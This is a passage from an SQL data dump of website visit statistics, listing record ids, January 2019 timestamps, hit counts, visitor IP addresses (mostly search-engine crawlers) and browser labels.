,0,'216.244.66.241','other'),(373731,1547934238,1,1,0,0,'35.192.84.7','other'),(373732,1547934299,1,1,0,0,'54.36.148.17','other'),(373733,1547934385,1,1,0,0,'46.229.168.130','other'),(373734,1547934386,1,1,0,0,'46.229.168.153','other'),(373735,1547934576,1,1,0,0,'54.36.149.59','other'),(373736,1547935362,1,1,0,0,'54.36.148.249','other'),(373737,1547935371,1,1,0,0,'54.36.148.48','other'),(373738,1547935582,2,2,0,0,'207.46.13.222','other'),(373739,1547935959,1,1,0,0,'66.249.75.20','chrome'),(373740,1547936049,1,1,0,0,'66.249.75.16','chrome'),(373741,1547936050,1,1,0,0,'66.249.75.21','chrome'),(373742,1547936160,6,6,0,0,'216.244.66.241','other'),(373743,1547936300,1,1,0,0,'66.249.75.144','chrome'),(373744,1547936508,1,1,0,0,'40.77.167.136','other'),(373745,1547936847,1,1,0,0,'66.249.75.22','chrome'),(373746,1547936959,1,1,0,0,'54.36.149.54','other'),(373747,1547937033,1,1,0,0,'54.36.148.50','other'),(373748,1547937100,1,1,0,0,'207.46.13.181','other'),(373749,1547937137,10,10,0,0,'216.244.66.241','other'),(373750,1547937158,1,1,0,0,'54.36.148.75','other'),(373751,1547937190,1,1,0,0,'207.46.13.222','other'),(373752,1547937599,1,1,0,0,'46.229.168.130','other'),(373753,1547937711,1,1,0,0,'54.36.148.219','other'),(373754,1547937916,2,2,0,0,'66.249.75.16','chrome'),(373755,1547938005,1,1,0,0,'8.29.198.26','other'),(373756,1547938047,2,2,0,0,'66.249.75.21','chrome'),(373757,1547938194,1,1,0,0,'207.46.13.181','other'),(373758,1547938544,1,1,0,0,'207.46.13.222','other'),(373759,1547938576,3,3,0,0,'216.244.66.241','other'),(373760,1547939184,1,1,0,0,'54.36.148.165','other'),(373761,1547939377,1,1,0,0,'54.36.148.227','other'),(373762,1547939494,1,1,0,0,'8.29.198.25','other'),(373763,1547939738,5,5,0,0,'216.244.66.241','other'),(373764,1547939855,1,1,0,0,'66.249.75.140','chrome'),(373765,1547939898,1,1,0,0,'54.36.149.66','other'),(373766,1547939931,1,1,0,0,'95.108.181.54','other'),(373767,1547940452,1,1,0,0,'54.36.148.29','other'),(373768,1547940468,2,2,0,0,'213.180.203.23','other'),(373769,1547940484,1,1,0,0,'37.9.113.148','other'),(373770,1547940557,1,1,0,0,'66.249.75.22','chrome'),(373771,1547940608,1,1,0,0,'54.36.148.85','other'),(373772,1547940613,2,2,0,0,'66.249.75.21','chrome'),(373773,1547940650,1,1,0,0,'66.249.75.20','chrome'),(373774,1547940758,1,1,0,0,'178.154.171.27','other'),(373775,1547940825,8,8,0,0,'216.244.66.241','other'),(373776,1547940950,1,1,0,0,'66.249.75.157','chrome'),(373777,1547940951,1,1,0,0,'66.249.75.140','chrome'),(373778,1547941083,1,1,0,0,'54.36.148.134','other'),(373779,1547941196,1,1,0,0,'213.180.203.40','other'),(373780,1547941538,1,1,0,0,'178.154.171.24','other'),(373781,1547941702,1,1,0,0,'178.154.244.65','other'),(373782,1547941719,1,1,0,0,'213.180.203.53','other'),(373783,1547941942,1,1,0,0,'5.45.207.79','other'),(373784,1547941963,1,1,0,0,'54.36.148.254','other'),(373785,1547942028,1,1,0,0,'141.8.142.103','other'),(373786,1547942100,1,1,0,0,'54.36.148.43','other'),(373787,1547942180,2,2,0,0,'66.249.75.21','chrome'),(373788,1547942245,1,1,0,0,'54.36.148.65','other'),(373789,1547942449,1,1,0,0,'66.249.75.22','chrome'),(373790,1547942450,1,1,0,0,'66.249.75.20','chrome'),(373791,1547942550,6,6,0,0,'216.244.66.241','other'),(373792,1547943006,1,1,0,0,'87.250.224.47','other'),(373793,1547943124,1,1,0,0,'213.180.203.40','other'),(373794,1547943126,1,1,0,0,'213.180.203.17','other'),(373795,1547943191,1,1,0,0,'95.108.213.4','other'),(373796,1547943206,1,1,0,0,'178.154.244.65','other'),(373797,1547943223,1,1,0,0,'141.8.142.38','other'),(373798,1547943304,1,1,0,0,'46.229.168.130','other'),(373799,1547943583,1,1,0,0,'46.229.168.138','other'),(373800,1547943596,10,10,0,0,'216.244.66.241','other'),(373801,1547944062,2,2,0,0,'66.249.75.21','chrome'),(373802,1547944399,1,1,0,0,'46.229.168.140','other'),(373803,1547944438,1,1,0,0,'46.229.168.137','other'),(373804,1547944512,1,1,0,0,'66.249.75.20','chrome'),(373805,1547944877,1,1,0,0,'54.36.148.18','other'),(373806,1547945023,1,1,0,0,'178.154.244.11','other'),(373807,1547945237,1,1,0,0,'141.8.142.103','other'),(373808,1547945367,3,3,0,0,'216.244.66.241','other'),(373809,1547945390,1,1,0,0,'54.36.148.247','other'),(373810,1547945819,1,1,0,0,'163.172.215.253','other'),(373811,1547946014,1,1,0,0,'66.249.75.22','chrome'),(373812,1547946138,1,1,0,0,'40.77.167.136','other'),(373813,1547946273,1,1,0,0,'66.249.75.142','chrome'),(373814,1547946512,7,7,0,0,'216.244.66.241','other'),(373815,1547946874,1,1,0,0,'207.46.13.171','other'),(373816,1547946975,1,1,0,0,'54.36.148.147','other'),(373817,1547947396,1,1,0,0,'54.36.148.78','other'),(373818,1547947533,1,1,0,0,'46.229.168.144','other'),(373819,1547947782,1,1,0,0,'54.36.149.77','other'),(373820,1547947784,1,1,0,0,'66.249.75.157','chrome'),(373822,1547947987,1,1,0,0,'54.36.148.210','other'),(373823,1547948035,1,1,0,0,'66.249.75.142','chrome'),(373824,1547948159,3,3,0,0,'216.244.66.241','other'),(373825,1547948251,1,1,0,0,'54.36.148.179','other'),(373826,1547948679,2,2,0,0,'157.55.39.60','other'),(373827,1547948836,1,1,0,0,'8.29.198.26','other'),(373828,1547949361,6,6,0,0,'216.244.66.241','other'),(373829,1547949745,1,1,0,0,'207.46.13.171','other'),(373830,1547950059,1,1,0,0,'54.36.148.195','other'),(373831,1547950338,1,1,0,0,'54.36.149.41','other'),(373832,1547950342,1,1,0,0,'8.29.198.27','other'),(373833,1547950598,1,1,0,0,'95.163.255.117','other'),(373834,1547950651,1,1,0,0,'95.163.255.114','other'),(373835,1547950698,1,1,0,0,'40.77.167.136','other'),(373836,1547950704,1,1,0,0,'46.229.168.151','other'),(373837,1547950922,8,8,0,0,'216.244.66.241','other'),(373838,1547951053,1,1,0,0,'46.229.168.146','other'),(373839,1547951751,1,1,0,0,'66.249.75.153','chrome'),(373840,1547951752,1,1,0,0,'66.249.75.142','chrome'),(373841,1547951854,1,1,0,0,'54.36.149.76','other'),(373842,1547951905,1,1,0,0,'40.77.167.136','other'),(373843,1547952015,8,8,0,0,'216.244.66.241','other'),(373844,1547952081,1,1,0,0,'54.36.148.100','other'),(373845,1547952292,1,1,0,0,'157.55.39.60','other'),(373846,1547952332,1,1,0,0,'66.249.75.21','chrome'),(373847,1547952720,1,1,0,0,'46.229.168.141','other'),(373848,1547952721,1,1,0,0,'46.229.168.146','other'),(373849,1547952854,1,1,0,0,'5.45.207.79','other'),(373850,1547952903,1,1,0,0,'46.229.168.154','other'),(373851,1547953040,1,1,0,0,'46.229.168.138','other'),(373852,1547953042,1,1,0,0,'46.229.168.147','other'),(373853,1547953114,1,1,0,0,'40.77.167.136','other'),(373854,1547953125,1,1,0,0,'95.108.213.4','other'),(373855,1547953144,1,1,0,0,'46.229.168.149','other'),(373856,1547953278,1,1,0,0,'141.8.142.103','other'),(373857,1547953355,1,1,0,0,'54.36.148.16','other'),(373858,1547953381,1,1,0,0,'66.249.75.17','chrome'),(373859,1547953481,1,1,0,0,'54.36.149.10','other'),(373860,1547953624,3,3,0,0,'66.249.75.21','chrome'),(373861,1547953773,2,2,0,0,'216.244.66.241','other'),(373862,1547953851,1,1,0,0,'46.229.168.144','other'),(373863,1547953853,1,1,0,0,'46.229.168.132','other'),(373864,1547953885,1,1,0,0,'66.249.75.20','chrome'),(373865,1547953941,1,1,0,0,'54.36.148.42','other'),(373866,1547954338,1,1,0,0,'66.249.75.22','chrome'),(373867,1547954513,1,1,0,0,'54.36.148.43','other'),(373868,1547954571,1,1,0,0,'54.36.148.216','other'),(373869,1547954712,1,1,0,0,'54.36.148.191','other'),(373870,1547954762,13,13,0,0,'216.244.66.241','other'),(373871,1547954904,1,1,0,0,'54.36.149.102','other'),(373872,1547954940,1,1,0,0,'207.241.229.213','other'),(373873,1547955010,1,1,0,0,'54.36.148.206','other'),(373874,1547955297,1,1,0,0,'46.229.168.134','other'),(373875,1547955394,1,1,0,0,'66.249.75.17','chrome'),(373877,1547955802,1,1,0,0,'54.36.148.58','other'),(373878,1547955840,2,2,0,0,'157.55.39.60','other'),(373879,1547955849,2,2,0,0,'46.229.168.133','other'),(373880,1547955881,1,1,0,0,'207.241.231.143','other'),(373881,1547955916,3,3,0,0,'66.249.75.20','chrome'),(373882,1547955979,2,2,0,0,'66.249.75.21','chrome'),(373883,1547956026,1,1,0,0,'207.241.231.147','other'),(373884,1547956169,2,2,0,0,'66.249.75.155','chrome'),(373885,1547956170,1,1,0,0,'66.249.75.142','chrome'),(373886,1547956258,1,1,0,0,'66.249.75.22','chrome'),(373887,1547956329,1,1,0,0,'66.249.75.144','chrome'),(373888,1547956582,1,1,0,0,'54.36.148.77','other'),(373889,1547956586,7,7,0,0,'216.244.66.241','other'),(373890,1547956782,1,1,0,0,'207.241.231.143','other'),(373891,1547956818,1,1,0,0,'54.36.148.128','other'),(373892,1547957399,1,1,0,0,'207.46.13.171','other'),(373893,1547957518,10,10,0,0,'216.244.66.241','other'),(373894,1547957538,1,1,0,0,'54.36.148.210','other'),(373895,1547957600,1,1,0,0,'40.77.167.29','other'),(373896,1547957979,1,1,0,0,'207.241.231.143','other'),(373897,1547958646,2,2,0,0,'207.241.229.148','other'),(373898,1547958820,1,1,0,0,'207.46.13.181','other'),(373899,1547959323,1,1,0,0,'207.241.231.147','other'),(373900,1547959373,1,1,0,0,'157.55.39.60','other'),(373901,1547959394,5,5,0,0,'216.244.66.241','other'),(373902,1547959405,1,1,0,0,'46.229.168.140','other'),(373903,1547959543,1,1,0,0,'46.229.168.150','other'),(373904,1547959668,1,1,0,0,'8.29.198.26','other'),(373905,1547959868,1,1,0,0,'66.249.75.21','chrome'),(373906,1547959952,1,1,0,0,'207.241.229.213','other'),(373907,1547960235,1,1,0,0,'54.36.148.141','other'),(373908,1547960468,1,1,0,0,'54.36.148.59','other'),(373909,1547960623,1,1,0,0,'54.36.148.29','other'),(373910,1547960768,8,8,0,0,'216.244.66.241','other'),(373911,1547960787,1,1,0,0,'207.241.229.51','other'),(373912,1547960835,1,1,0,0,'207.241.229.148','other'),(373913,1547960947,2,2,0,0,'66.249.75.15','chrome'),(373914,1547961106,1,1,0,0,'66.249.75.21','chrome'),(373915,1547961184,1,1,0,0,'8.29.198.25','other'),(373916,1547961309,1,1,0,0,'46.229.168.139','other'),(373917,1547961312,1,1,0,0,'46.229.168.135','other'),(373918,1547961581,1,1,0,0,'66.249.75.20','chrome'),(373919,1547961690,2,2,0,0,'46.229.168.145','other'),(373920,1547962203,5,5,0,0,'216.244.66.241','other'),(373921,1547962297,1,1,0,0,'66.249.75.142','chrome'),(373922,1547962385,1,1,0,0,'207.46.13.181','other'),(373923,1547962386,1,1,0,0,'66.249.75.15','chrome'),(373924,1547962465,1,1,0,0,'54.36.148.106','other'),(373925,1547962593,1,1,0,0,'54.36.149.27','other'),(373927,1547962831,1,1,0,0,'207.241.229.51','other'),(373928,1547962841,1,1,0,0,'66.249.75.22','chrome'),(373929,1547963173,1,1,0,0,'207.241.231.147','other'),(373930,1547963203,1,1,0,0,'207.241.229.148','other'),(373931,1547963205,8,8,0,0,'216.244.66.241','other'),(373932,1547963264,1,1,0,0,'46.229.168.132','other'),(373933,1547963382,1,1,0,0,'46.229.168.138','other'),(373934,1547963891,1,1,0,0,'54.36.149.80','other'),(373935,1547964224,3,3,0,0,'216.244.66.241','other'),(373936,1547964301,2,2,0,0,'192.42.116.14','other'),(373937,1547964978,4,4,0,0,'144.76.14.153','other'),(373938,1547964986,3,3,0,0,'207.46.13.171','other'),(373939,1547964999,4,4,0,0,'5.9.154.69','other'),(373940,1547965126,11,11,0,0,'216.244.66.241','other'),(373941,1547965546,1,1,0,0,'207.241.231.143','other'),(373942,1547965713,1,1,0,0,'207.46.13.32','other'),(373943,1547965761,1,1,0,0,'207.241.229.213','other'),(373944,1547965968,2,2,0,0,'5.45.207.79','other'),(373945,1547966040,4,4,0,0,'216.244.66.241','other'),(373946,1547966052,1,1,0,0,'178.154.244.11','other'),(373947,1547966135,1,1,0,0,'5.45.207.19','other'),(373948,1547966285,2,2,0,0,'141.8.142.103','other'),(373949,1547966826,1,1,0,0,'37.9.113.148','other'),(373950,1547966860,2,2,0,0,'213.180.203.17','other'),(373951,1547966938,1,1,0,0,'66.249.75.15','chrome'),(373952,1547966939,1,1,0,0,'66.249.75.21','chrome'),(373953,1547967456,1,1,0,0,'207.241.229.213','other'),(373954,1547967652,1,1,0,0,'54.36.149.80','other'),(373955,1547967784,4,4,0,0,'216.244.66.241','other'),(373956,1547967803,1,1,0,0,'207.241.231.143','other'),(373957,1547967812,1,1,0,0,'207.241.229.148','other'),(373958,1547967986,1,1,0,0,'54.36.148.179','other'),(373959,1547968088,1,1,0,0,'54.36.148.202','other'),(373960,1547968129,1,1,0,0,'207.46.13.181','other'),(373961,1547968135,1,1,0,0,'207.46.13.122','other'),(373962,1547968200,1,1,0,0,'95.108.181.54','other'),(373963,1547968211,2,2,0,0,'66.249.75.20','chrome'),(373964,1547968257,1,1,0,0,'54.36.149.98','other'),(373965,1547968359,1,1,0,0,'207.241.229.213','other'),(373966,1547968424,2,2,0,0,'66.249.75.15','chrome'),(373967,1547968443,2,2,0,0,'60.191.38.77','firefox'),(373968,1547968484,1,1,0,0,'66.249.69.150','chrome'),(373969,1547968522,2,2,0,0,'207.241.229.51','other'),(373970,1547969039,2,2,0,0,'216.244.66.241','other'),(373971,1547969745,1,1,0,0,'157.55.39.143','other'),(373972,1547970071,1,1,0,0,'66.249.69.143','chrome'),(373973,1547970072,1,1,0,0,'66.249.69.148','chrome'),(373974,1547970165,2,2,0,0,'207.241.229.51','other'),(373975,1547970507,1,1,0,0,'8.29.198.25','other'),(373976,1547970579,7,7,0,0,'216.244.66.241','other'),(373977,1547970581,1,1,0,0,'207.46.13.122','other'),(373978,1547970945,2,2,0,0,'207.241.231.147','other'),(373979,1547971196,1,1,0,0,'157.55.39.143','other'),(373980,1547971418,1,1,0,0,'46.229.168.139','other'),(373981,1547971690,8,8,0,0,'216.244.66.241','other'),(373982,1547972026,1,1,0,0,'8.29.198.26','other'),(373983,1547972799,2,2,0,0,'207.241.231.151','other'),(373984,1547973031,1,1,0,0,'207.46.13.122','other'),(373985,1547973099,1,1,0,0,'207.241.229.148','other'),(373986,1547973384,4,4,0,0,'216.244.66.241','other'),(373987,1547973729,1,1,0,0,'66.249.69.143','chrome'),(373989,1547974490,7,7,0,0,'216.244.66.241','other'),(373990,1547974696,1,1,0,0,'207.241.231.151','other'),(373991,1547974704,1,1,0,0,'46.229.168.138','other'),(373992,1547974715,3,3,0,0,'207.241.231.147','other'),(373993,1547974716,1,1,0,0,'46.229.168.129','other'),(373994,1547974829,1,1,0,0,'207.241.231.143','other'),(373995,1547975038,1,1,0,0,'207.241.229.51','other'),(373996,1547975198,2,2,0,0,'207.46.13.91','other'),(373997,1547975252,1,1,0,0,'157.55.39.60','other'),(373998,1547975400,3,3,0,0,'216.244.66.241','other'),(373999,1547975415,1,1,0,0,'207.241.229.213','other'),(374000,1547975518,1,1,0,0,'207.46.13.122','other'),(374001,1547976076,1,1,0,0,'207.241.231.143','other'),(374002,1547976231,1,1,0,0,'207.241.229.51','other'),(374003,1547976261,1,1,0,0,'46.229.168.141','other'),(374004,1547976310,8,8,0,0,'216.244.66.241','other'),(374005,1547976329,1,1,0,0,'207.241.231.151','other'),(374006,1547976498,1,1,0,0,'180.76.15.28','other'),(374007,1547976500,1,1,0,0,'180.76.15.34','other'),(374008,1547976785,1,1,0,0,'207.241.229.148','other'),(374009,1547976955,16,16,0,0,'121.42.50.93','other'),(374010,1547977213,1,1,0,0,'66.249.69.143','chrome'),(374011,1547977214,1,1,0,0,'66.249.69.148','chrome'),(374012,1547977352,1,1,0,0,'207.241.229.51','other'),(374013,1547977516,4,4,0,0,'216.244.66.241','other'),(374014,1547977816,1,1,0,0,'207.46.13.122','other'),(374015,1547978184,2,2,0,0,'157.55.39.60','other'),(374016,1547978259,6,6,0,0,'159.65.207.214','other'),(374017,1547978811,1,1,0,0,'46.229.168.137','other'),(374018,1547978852,1,1,0,0,'207.241.229.148','other'),(374019,1547978869,1,1,0,0,'66.249.69.148','chrome'),(374020,1547978930,4,4,0,0,'216.244.66.241','other'),(374021,1547978954,1,1,0,0,'207.241.229.213','other'),(374022,1547979377,4,4,0,0,'159.65.207.214','other'),(374023,1547979443,1,1,0,0,'207.241.231.147','other'),(374024,1547979481,1,1,0,0,'66.249.75.142','chrome'),(374025,1547979485,1,1,0,0,'207.241.231.151','other'),(374026,1547979577,1,1,0,0,'207.46.13.122','other'),(374027,1547979852,1,1,0,0,'207.241.231.143','other'),(374028,1547979910,1,1,0,0,'207.241.229.51','other'),(374029,1547980075,5,5,0,0,'216.244.66.241','other'),(374030,1547980170,1,1,0,0,'66.249.75.155','chrome'),(374031,1547980172,1,1,0,0,'195.88.158.166','chrome'),(374032,1547980258,1,1,0,0,'207.241.229.148','other'),(374033,1547980281,1,1,0,0,'66.249.69.148','chrome'),(374034,1547980392,1,1,0,0,'5.45.207.79','other'),(374035,1547980413,3,3,0,0,'5.45.207.19','other'),(374036,1547980490,3,3,0,0,'141.8.142.103','other'),(374037,1547980736,1,1,0,0,'178.154.244.11','other'),(374038,1547980790,1,1,0,0,'40.77.167.72','other'),(374039,1547981299,2,2,0,0,'5.45.207.79','other'),(374040,1547981337,1,1,0,0,'8.29.198.27','other'),(374041,1547981567,1,1,0,0,'207.241.231.143','other'),(374042,1547981782,4,4,0,0,'216.244.66.241','other'),(374043,1547982134,1,1,0,0,'207.241.229.213','other'),(374044,1547982329,1,1,0,0,'207.241.229.51','other'),(374045,1547982595,1,1,0,0,'207.241.231.147','other'),(374046,1547982701,3,3,0,0,'216.244.66.241','other'),(374047,1547982867,1,1,0,0,'46.133.3.31','chrome'),(374048,1547982871,1,1,0,0,'8.29.198.27','other'),(374049,1547983089,1,1,0,0,'40.77.167.71','other'),(374050,1547983269,1,1,0,0,'66.249.69.145','chrome'),(374051,1547983270,1,1,0,0,'66.249.69.150','chrome'),(374052,1547983319,1,1,0,0,'66.249.69.143','chrome'),(374054,1547983492,1,1,0,0,'66.249.69.149','chrome'),(374055,1547984030,1,1,0,0,'141.8.142.103','other'),(374056,1547984353,1,1,0,0,'5.255.253.25','other'),(374057,1547984525,3,3,0,0,'216.244.66.241','other'),(374058,1547985457,1,1,0,0,'66.249.75.140','chrome'),(374059,1547985627,3,3,0,0,'207.241.229.148','other'),(374060,1547986743,1,1,0,0,'66.249.75.155','chrome'),(374062,1547986773,2,2,0,0,'66.249.75.17','chrome'),(374063,1547986774,1,1,0,0,'66.249.75.20','chrome'),(374064,1547986916,3,3,0,0,'207.241.231.143','other'),(374065,1547987199,1,1,0,0,'46.229.168.137','other'),(374066,1547987311,9,9,0,0,'216.244.66.241','other'),(374067,1547987645,2,2,0,0,'207.241.229.51','other'),(374068,1547987762,1,1,0,0,'207.241.229.213','other'),(374069,1547987850,2,2,0,0,'207.241.229.148','other'),(374070,1547987968,1,1,0,0,'207.241.231.143','other'),(374071,1547988332,1,1,0,0,'157.55.39.60','other'),(374072,1547988591,11,11,0,0,'216.244.66.241','other'),(374073,1547988731,1,1,0,0,'40.77.167.72','other'),(374074,1547988809,1,1,0,0,'66.249.75.21','chrome'),(374075,1547989462,1,1,0,0,'157.55.39.60','other'),(374076,1547990096,7,7,0,0,'216.244.66.241','other'),(374077,1547990271,1,1,0,0,'46.229.168.154','other'),(374078,1547990428,2,2,0,0,'91.209.11.236','other'),(374079,1547990903,1,1,0,0,'207.241.231.147','other'),(374080,1547991106,1,1,0,0,'46.229.168.135','other'),(374081,1547991138,1,1,0,0,'66.249.75.16','chrome'),(374083,1547991305,4,4,0,0,'216.244.66.241','other'),(374084,1547991351,1,1,0,0,'66.249.75.20','chrome'),(374085,1547991828,2,2,0,0,'207.241.229.51','other'),(374086,1547992071,3,3,0,0,'178.154.244.11','other'),(374087,1547992165,1,1,0,0,'8.29.198.25','other'),(374088,1547992429,1,1,0,0,'207.241.229.148','other'),(374089,1547992581,6,6,0,0,'5.45.207.79','other'),(374090,1547992683,1,1,0,0,'87.250.224.47','other'),(374091,1547992740,1,1,0,0,'40.77.167.18','other'),(374092,1547992855,1,1,0,0,'207.241.231.143','other'),(374093,1547992940,4,4,0,0,'216.244.66.241','other'),(374094,1547992941,1,1,0,0,'40.77.169.22','other'),(374095,1547993029,2,2,0,0,'178.154.244.11','other'),(374096,1547993382,1,1,0,0,'46.229.168.130','other'),(374097,1547993395,1,1,0,0,'46.229.168.141','other'),(374098,1547993499,1,1,0,0,'5.45.207.79','other'),(374099,1547993729,1,1,0,0,'8.29.198.26','other'),(374100,1547993922,1,1,0,0,'216.244.66.241','other'),(374101,1547994063,2,2,0,0,'40.77.167.18','other'),(374102,1547994126,1,1,0,0,'66.249.75.17','chrome'),(374104,1547994188,1,1,0,0,'207.241.231.143','other'),(374105,1547994928,6,6,0,0,'216.244.66.241','other'),(374106,1547995230,1,1,0,0,'66.249.75.21','chrome'),(374107,1547995498,1,1,0,0,'46.229.168.154','other'),(374108,1547995771,1,1,0,0,'207.241.229.51','other'),(374109,1547995908,1,1,0,0,'66.249.75.22','chrome'),(374110,1547995944,1,1,0,0,'93.72.49.19','chrome'),(374111,1547995948,7,7,0,0,'216.244.66.241','other'),(374112,1547995967,2,2,0,0,'91.196.178.189','chrome'),(374113,1547996022,1,1,0,0,'46.229.168.129','other'),(374114,1547996431,1,1,0,0,'207.241.229.213','other'),(374115,1547996441,1,1,0,0,'157.55.39.106','other'),(374116,1547996622,2,2,0,0,'40.77.167.18','other'),(374117,1547996865,5,5,0,0,'216.244.66.241','other'),(374118,1547997169,2,2,0,0,'207.241.231.147','other'),(374119,1547997303,1,1,0,0,'46.254.219.235','msie'),(374120,1547997400,1,1,0,0,'207.241.229.213','other'),(374121,1547997617,2,2,0,0,'207.241.229.148','other'),(374122,1547997645,1,1,0,0,'40.77.167.18','other'),(374123,1547997650,1,1,0,0,'66.249.75.21','chrome'),(374124,1547997700,1,1,0,0,'66.249.75.155','chrome'),(374125,1547997701,1,1,0,0,'66.249.75.142','chrome'),(374126,1547997742,1,1,0,0,'207.241.231.151','other'),(374127,1547997830,2,2,0,0,'46.211.111.242','chrome'),(374128,1547997880,1,1,0,0,'5.45.207.19','other'),(374129,1547998061,1,1,0,0,'5.45.207.79','other'),(374130,1547998087,1,1,0,0,'207.46.13.130','other'),(374131,1547998207,1,1,0,0,'66.249.75.22','chrome'),(374132,1547998488,4,4,0,0,'216.244.66.241','other'),(374133,1547998519,1,1,0,0,'207.241.229.213','other'),(374134,1547998935,1,1,0,0,'207.241.231.143','other'),(374135,1547999331,1,1,0,0,'66.249.65.213','chrome'),(374136,1547999332,2,2,0,0,'66.249.65.198','chrome'),(374137,1547999341,1,1,0,0,'66.249.65.211','chrome'),(374138,1547999387,1,1,0,0,'207.46.13.130','other'),(374139,1547999530,6,6,0,0,'216.244.66.241','other'),(374140,1547999959,2,2,0,0,'207.241.229.51','other'),(374141,1548000342,1,1,0,0,'207.241.231.143','other'),(374142,1548000482,4,4,0,0,'216.244.66.241','other'),(374143,1548001364,1,1,0,0,'207.241.231.143','other'),(374144,1548001520,6,6,0,0,'216.244.66.241','other'),(374145,1548001603,2,2,0,0,'207.241.229.51','other'),(374146,1548001968,1,1,0,0,'66.249.65.196','chrome'),(374147,1548002511,8,8,0,0,'216.244.66.241','other'),(374148,1548002704,1,1,0,0,'66.249.73.31','chrome'),(374149,1548002986,1,1,0,0,'8.29.198.27','other'),(374150,1548003005,1,1,0,0,'207.241.231.143','other'),(374151,1548003074,1,1,0,0,'207.46.13.200','other'),(374152,1548003123,1,1,0,0,'207.46.13.119','other'),(374153,1548003174,1,1,0,0,'66.249.65.198','chrome'),(374154,1548003415,1,1,0,0,'13.66.139.0','other'),(374155,1548003585,1,1,0,0,'46.229.168.144','other'),(374156,1548003693,1,1,0,0,'207.241.229.51','other'),(374157,1548004046,8,8,0,0,'216.244.66.241','other'),(374158,1548004067,2,2,0,0,'207.241.229.148','other'),(374159,1548004069,2,2,0,0,'207.241.231.143','other'),(374160,1548004361,1,1,0,0,'46.229.168.129','other'),(374161,1548004508,1,1,0,0,'5.255.253.16','other'),(374162,1548004511,1,1,0,0,'178.154.244.11','other'),(374163,1548004577,1,1,0,0,'8.29.198.26','other'),(374164,1548004580,1,1,0,0,'178.154.171.30','other'),(374165,1548004586,2,2,0,0,'141.8.142.103','other'),(374166,1548004703,2,2,0,0,'40.77.167.71','other'),(374167,1548004730,1,1,0,0,'207.241.229.51','other'),(374168,1548004806,1,1,0,0,'141.8.132.16','other'),(374169,1548004886,1,1,0,0,'213.180.203.53','other'),(374170,1548004947,1,1,0,0,'178.154.200.48','other'),(374171,1548004953,1,1,0,0,'141.8.183.23','other'),(374172,1548004955,6,6,0,0,'216.244.66.241','other'),(374173,1548004956,1,1,0,0,'37.9.113.20','other'),(374174,1548005017,1,1,0,0,'141.8.142.81','other'),(374175,1548005033,2,2,0,0,'66.249.73.30','chrome'),(374176,1548005141,1,1,0,0,'95.108.213.50','other'),(374177,1548005183,1,1,0,0,'178.154.171.24','other'),(374178,1548005246,1,1,0,0,'95.108.181.54','other'),(374179,1548005289,1,1,0,0,'207.241.229.148','other'),(374180,1548005558,1,1,0,0,'87.250.224.47','other'),(374181,1548005565,1,1,0,0,'207.46.13.200','other'),(374182,1548005567,1,1,0,0,'207.241.231.143','other'),(374183,1548005577,3,3,0,0,'5.45.207.19','other'),(374184,1548005627,1,1,0,0,'207.241.229.213','other'),(374185,1548005628,1,1,0,0,'95.108.213.4','other'),(374186,1548005670,1,1,0,0,'178.159.37.73','chrome'),(374187,1548005673,1,1,0,0,'178.154.244.11','other'),(374188,1548005797,1,1,0,0,'54.36.148.224','other'),(374189,1548005979,1,1,0,0,'141.8.142.103','other'),(374190,1548006426,1,1,0,0,'54.36.148.101','other'),(374191,1548006767,1,1,0,0,'207.241.229.51','other'),(374192,1548007496,2,2,0,0,'91.196.178.45','firefox'),(374193,1548007540,1,1,0,0,'54.36.149.42','other'),(374194,1548007552,1,1,0,0,'54.36.149.105','other'),(374195,1548007629,4,4,0,0,'92.113.174.59','chrome'),(374196,1548007744,5,5,0,0,'216.244.66.241','other'),(374197,1548007796,1,1,0,0,'54.36.149.38','other'),(374198,1548008060,1,1,0,0,'54.36.148.29','other'),(374199,1548008304,1,1,0,0,'40.77.169.22','other'),(374200,1548008569,1,1,0,0,'178.154.244.11','other'),(374201,1548008665,1,1,0,0,'54.36.148.201','other'),(374202,1548008703,1,1,0,0,'216.244.66.241','other'),(374203,1548008770,1,1,0,0,'180.76.15.24','other'),(374204,1548009450,1,1,0,0,'141.8.142.103','other'),(374205,1548009452,1,1,0,0,'54.36.148.228','other'),(374206,1548009509,1,1,0,0,'54.36.149.79','other'),(374207,1548009622,5,5,0,0,'216.244.66.241','other'),(374208,1548009625,1,1,0,0,'54.36.149.39','other'),(374209,1548009644,1,1,0,0,'54.36.148.225','other'),(374210,1548009817,1,1,0,0,'46.229.168.130','other'),(374211,1548009846,1,1,0,0,'46.229.168.152','other'),(374212,1548009884,1,1,0,0,'54.36.148.162','other'),(374213,1548009992,1,1,0,0,'54.36.148.173','other'),(374214,1548010103,1,1,0,0,'54.36.149.103','other'),(374215,1548010226,1,1,0,0,'54.36.149.89','other'),(374216,1548010372,1,1,0,0,'54.36.149.3','other'),(374217,1548010775,5,5,0,0,'216.244.66.241','other'),(374218,1548010856,1,1,0,0,'66.249.65.213','chrome'),(374219,1548010857,1,1,0,0,'66.249.65.198','chrome'),(374220,1548010897,1,1,0,0,'66.249.73.31','chrome'),(374221,1548011170,1,1,0,0,'66.249.65.194','chrome'),(374222,1548011544,1,1,0,0,'54.36.148.102','other'),(374223,1548011710,1,1,0,0,'54.36.148.149','other'),(374224,1548011891,1,1,0,0,'54.36.148.125','other'),(374225,1548011936,1,1,0,0,'180.76.15.140','other'),(374226,1548012057,1,1,0,0,'46.229.168.148','other'),(374227,1548012335,1,1,0,0,'54.36.149.5','other'),(374228,1548012425,2,2,0,0,'40.77.167.157','other'),(374229,1548012430,10,10,0,0,'216.244.66.241','other'),(374230,1548012509,1,1,0,0,'46.229.168.150','other'),(374231,1548012523,1,1,0,0,'207.46.13.1','other'),(374232,1548012618,1,1,0,0,'66.249.65.196','chrome'),(374233,1548012708,1,1,0,0,'54.36.148.217','other'),(374234,1548012829,1,1,0,0,'54.36.148.72','other'),(374235,1548012904,1,1,0,0,'54.36.148.40','other'),(374236,1548013102,1,1,0,0,'54.36.148.212','other'),(374237,1548013324,1,1,0,0,'188.163.92.143','chrome'),(374238,1548013350,7,7,0,0,'216.244.66.241','other'),(374239,1548013448,1,1,0,0,'66.249.65.213','chrome'),(374240,1548013449,1,1,0,0,'66.249.65.194','chrome'),(374241,1548013600,1,1,0,0,'66.249.65.209','chrome'),(374242,1548013601,2,2,0,0,'66.249.65.198','chrome'),(374243,1548013723,1,1,0,0,'5.45.207.79','other'),(374244,1548013811,1,1,0,0,'8.29.198.25','other'),(374245,1548013936,1,1,0,0,'40.77.169.22','other'),(374246,1548014300,1,1,0,0,'46.229.168.129','other'),(374247,1548014805,1,1,0,0,'54.36.149.33','other'),(374248,1548014831,1,1,0,0,'54.3